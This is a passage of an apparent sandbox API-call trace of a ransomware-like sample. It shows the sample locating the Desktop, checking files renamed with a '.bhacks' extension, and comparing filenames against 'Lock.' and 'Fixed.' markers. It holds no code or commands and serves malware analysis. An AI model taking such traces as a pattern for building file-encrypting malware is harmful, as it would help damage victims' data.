ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 0 [0106.886] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0106.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a756f0 | out: hHeap=0x2af0000) returned 1 [0106.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0106.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0106.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0106.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0106.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0106.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0106.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0106.887] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.887] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0106.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0106.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0106.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75600 [0106.888] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", lpFilePart=0x8cf650*="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks") returned 0x37 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75600 | out: hHeap=0x2af0000) returned 1 [0106.888] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg.bhacks")) returned 0xffffffff [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0106.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0106.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0106.889] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0106.889] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.889] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WLViPvkU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LViPvkU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ViPvkU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iPvkU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PvkU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vkU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kU.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0106.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0106.890] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0106.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2a69700 [0106.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WLViPvkU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LViPvkU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ViPvkU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iPvkU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PvkU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vkU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kU.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66b8 [0106.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66b8 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0106.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0106.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0106.892] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0106.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0106.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0106.892] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0106.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0106.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.893] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0106.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61b0 [0106.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0106.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0106.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: 